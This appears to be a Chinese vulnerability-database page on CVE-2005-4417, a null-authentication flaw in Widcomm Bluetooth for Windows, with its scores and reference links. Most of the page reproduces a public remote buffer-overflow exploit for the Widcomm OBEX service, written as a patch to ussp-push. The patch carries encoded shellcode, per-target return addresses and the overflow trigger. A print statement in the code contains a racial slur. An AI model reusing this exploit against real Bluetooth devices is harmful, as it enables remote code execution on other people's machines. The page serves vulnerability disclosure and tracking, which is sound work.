CVE-2005-4417
CVSS6.4
发布时间 :2005-12-20 06:03:00
修订时间 :2008-09-05 16:56:50
NMCOE    

[原文]The default configuration of Widcomm Bluetooth for Windows (BTW) 4.0.1.1500 and earlier, as installed on Belkin Bluetooth Software 1.4.2 Build 10 and ANYCOM Blue USB-130-250 Software 4.0.1.1500, and possibly other devices, sets null Authentication and Authorization values, which allows remote attackers to send arbitrary audio and possibly eavesdrop using the microphone via the Hands Free Audio Gateway and Headset profile.


[CNNVD]Widcomm Bluetooth for Windows 远程攻击漏洞(CNNVD-200512-459)

        Widcomm Bluetooth for Windows (BTW) 4.0.1.1500及更早版本的默认配置,在安装在Belkin Bluetooth Software 1.4.2 Build 10和ANYCOM Blue USB-130-250 Software 4.0.1.1500上时,也可能其它设备上时,设置了空认证和授权值,远程攻击者可通过Hands Free Audio Gateway和Headset概要文件发送任意音频,也可能使用麦克风进行窃听。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:belkin:bluetooth_software:1.4.2_build_10
cpe:/a:widcomm:bluetooth_for_windows:4.0.1.1500
cpe:/a:anycom:blue_usb-130-250_software:4.0.1.1500

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4417
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4417
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-459
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/archive/1/419642/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051216 DMA[2005-1214a] - 'Widcomm BTW - Bluetooth for Windows Remote Audio Eavesdropping'

- 漏洞信息

Widcomm Bluetooth for Windows 远程攻击漏洞
中危 未知
2005-12-20 00:00:00 2005-12-20 00:00:00
远程  
        Widcomm Bluetooth for Windows (BTW) 4.0.1.1500及更早版本的默认配置,在安装在Belkin Bluetooth Software 1.4.2 Build 10和ANYCOM Blue USB-130-250 Software 4.0.1.1500上时,也可能其它设备上时,设置了空认证和授权值,远程攻击者可通过Hands Free Audio Gateway和Headset概要文件发送任意音频,也可能使用麦克风进行窃听。

- 公告与补丁

        

- 漏洞信息 (1357)

WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit (EDBID:1357)
windows remote
2005-12-04 Verified
0 Kevin Finisterre
N/A [点击下载]
--- ussp-push-0.4/obex_main.c	2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c	2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
 /*
+   http://www.digitalmunition.com
+   Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest. 
+   http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
  * UNrooted.net example code
  *
  * Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@
 
 #include "obex_socket.h"
 
-#define UPUSH_APPNAME "ussp-push v0.4"
+#include <bluetooth/hci.h>
+#include <bluetooth/hci_lib.h>
+
+#define UPUSH_APPNAME "BluePIMped v0.1"
 #define BT_SERVICE "OBEX"
 #define OBEX_PUSH        5
 
@@ -316,6 +325,9 @@
 	switch (event)  {
         case OBEX_EV_PROGRESS:
 		printf("Made some progress...\n");
+		sleep(3);
+		printf("Peace nigga...\n");
+		exit(0);
 		break;
 
         case OBEX_EV_ABORT:
@@ -382,9 +394,7 @@
 	name = remote;
 
 	name_len = (strlen(name)+1)<<1;
-	if( (namebuf = g_malloc(name_len)) )    {
-		OBEX_CharToUnicode(namebuf, name, name_len);
-	}
+	namebuf = name; // Thanks Mark! If you had not mentioned client side unicode i'd still be stuck messing with venetian shellcode. 
 
 	buf = easy_readfile(path, &file_size);
 	if(buf == NULL) {
@@ -424,6 +434,24 @@
 	return err;
 }
 
+static void set_device_name(int ctl, int hdev, char *opt)  // Johnh as usual... 
+{
+         int s = hci_open_dev(hdev);
+
+         if (s < 0) {
+                 fprintf(stderr, "Can't open device hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                 exit(1);
+         }
+         if (opt) {
+                 if (hci_write_local_name(s, opt, 2000) < 0) {
+                         fprintf(stderr, "Can't change local name on hci%d: %s (%d)\n",
+                                                 hdev, strerror(errno), errno);
+                         exit(1);
+                 }
+	}
+
+}
 
 /*
  * That's all there is to it.  With it all setup like this all I have to do
@@ -434,19 +462,87 @@
 
 int main( int argc, char **argv )
 {
-	if ( argc != 4 ) {
-		printf("%s\n\n"
-		       "Usage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n"
-		       "\tDEVICE        = RFCOMM TTY device file\n"
-		       "\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n"
-		       "\tLFILE         = Local file path\n"
-		       "\tRFILE         = Remote file name\n\n",
-		       UPUSH_APPNAME, argv[0]);
+/* 
+	The following may be necessary in hcid.conf to prevent the pairing prompts.
+
+       # Authentication and Encryption (Security Mode 3)
+        auth disable;
+        encrypt disable;
+*/
+
+	struct
+	{
+  		char *os;
+  		u_long ret;
+	}
+ 	targets[] =
+ 	{
+  		{ "[ XP Pro SP0   - Ambicom btysb1.4.2w.zip 1.4.2 Build 10 ]", 0x01abf74e },
+  		{ "[ XP Pro SP0   - Actiontec Bluetooth Software (ver 1.1 cd label) ]", 0x019bf74e },
+  		{ "[ XP Pro SP0   - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x019bf74e },
+  		{ "[ XP Pro SP1a  - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0197f74e },
+  		{ "[ XP Home SP1a (and Pro?) - Belkin Bluetooth Software 1.4.2 Build 10 ]", 0x0199f74e },
+  		{ "[ Crash ]", 0x41424344 },
+	}, v;
+
+	if ( argc != 3 ) {
+		printf("%s\nUsage: %s {DEVICE, BTADDR@BTCHAN} LFILE RFILE\n\n\tDEVICE        = RFCOMM TTY device file\n\tBTADDR@BTCHAN = BlueTooth address/name and OBEX channel\n\tTARGET 	= Target number\n",UPUSH_APPNAME,argv[0]);
+		printf("Types:\n");
+		int i;
+  		for(i = 0; i < sizeof(targets)/sizeof(v); i++)
+  		printf("%d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os);
+
 		return( -1 );
 	}
 
-	printf( "pushing file %s\n", argv[2] );
-	if ( obex_push( (void *)argv[1], argv[2], argv[3] ) != 0 ) {
+	/* http://www.edup.tudelft.nl/~bjwever/ - w32_popup_ExitThread.c */
+	/* Size=224 Encoder=ShikataGaNai http://metasploit.com */
+	/* CATS: ALL YOUR BLUETOOTH ARE BELONG TO US. */ 
+	/* this still crashes the BTStackServer.exe... but oh well */
+	unsigned char scode[] = 
+	"\x2b\xc9\xda\xcd\xd9\x74\x24\xf4\x5f\xb1\x33\xb8\xd1\xf7\x19\xb7"
+	"\x31\x47\x15\x83\xc7\x04\x03\x96\xe6\xfb\x42\xe4\x38\x3c\xc8\x9f"
+	"\x7b\x8c\x9a\xdf\x77\x67\xec\xc3\x2a\xfc\x65\xf3\x5c\x6f\x1a\x03"
+	"\x9d\x07\xd1\x31\xb3\xb3\x7d\x40\xb8\x5e\x0c\xfe\x85\xd0\x57\x16"
+	"\x07\xfa\xce\xe6\xf8\xfb\x67\x09\x71\x3e\x46\x07\xd0\x29\xaf\xa7"
+	"\xd5\xa9\xf3\xe6\x81\xfa\xc9\xe8\xc1\xd8\x2d\xe8\x11\x62\x62\xa4"
+	"\x31\x3d\x35\x61\x60\x9d\x8b\xc5\xd1\x98\x5f\x9a\x96\x76\x28\x04"
+	"\x68\x25\xed\x64\x28\x8c\xa1\x2b\xe2\x49\x1a\xe7\xb5\x75\x0f\x54"
+	"\x64\x76\xfd\xe1\x9a\x7a\xc8\xef\xb3\x8c\xca\x0f\x44\xa2\x0a\x5f"
+	"\xcd\x39\x31\x36\xd0\x83\x7c\x20\xea\x03\x81\xb0\xbd\x54\x0a\xf5"
+	"\x7d\xd0\x58\xf0\x05\xe7\x8a\xa8\x7e\xb5\x6a\x4d\x6b\x0b\xab\x7c"
+	"\xa2\x2d\xa0\x4a\xbe\xaf\x58\x83\x41\x6e\x6b\xf0\x11\x70\xb3\x73"
+	"\xa9\x06\xcd\x42\xf5\x9c\xdb\xee\x82\x05\x38\x0f\x7e\xdf\xcb\x03"
+	"\xcb\xab\x96\x07\xca\x40\xad\x33\x47\x97\x5a\x64\x09\x67\x7a\x9a";
+	
+	set_device_name(0,0,scode);
+	//printf("RENAME DONE: SET NEW NAME TO %s\n",scode);
+	//printf( "pushing file.\n");
+
+	char buf[3000];
+	memset(buf,'\0',sizeof(buf));
+	memset(buf,'Z',3); // Sometimes u need 3 z's 
+
+        int type = atoi(argv[2]);
+        if(type)
+        {
+        	printf("[-] Selected target:\n");
+              	printf("    %d [0x%.8x]: %s\n", type, targets[type].ret, targets[type].os);              
+        }
+
+	int x;
+	for(x=0; x<=122; x=x+1)
+	{
+    		memcpy(buf+3+(x*4), (unsigned char *) &targets[type].ret, 4);
+	}
+	// Populate HKEY_LOCAL_MACHINE\SOFTWARE\Widcomm\BTConfig\Devices\<bdaddr>\Name with shellcode
+	if ( obex_push( (void *)argv[1], "/etc/hosts", "YouAreBeingPwnedViaBlueTooth") != 0 ) {
+		printf( "error\n" );
+		return( -1 );
+	}
+	printf("\nsleeping 3 seconds before triggering the shellcode\n"); 
+	sleep(3);
+	if ( obex_push( (void *)argv[1], "/etc/hosts", buf ) != 0 ) {
 		printf( "error\n" );
 		return( -1 );
 	}

// milw0rm.com [2005-12-04]
		

- 漏洞信息

22800
WIDCOMM Bluetooth Null Authentication/Authorization Remote Audio Manipulation
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-12-16 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站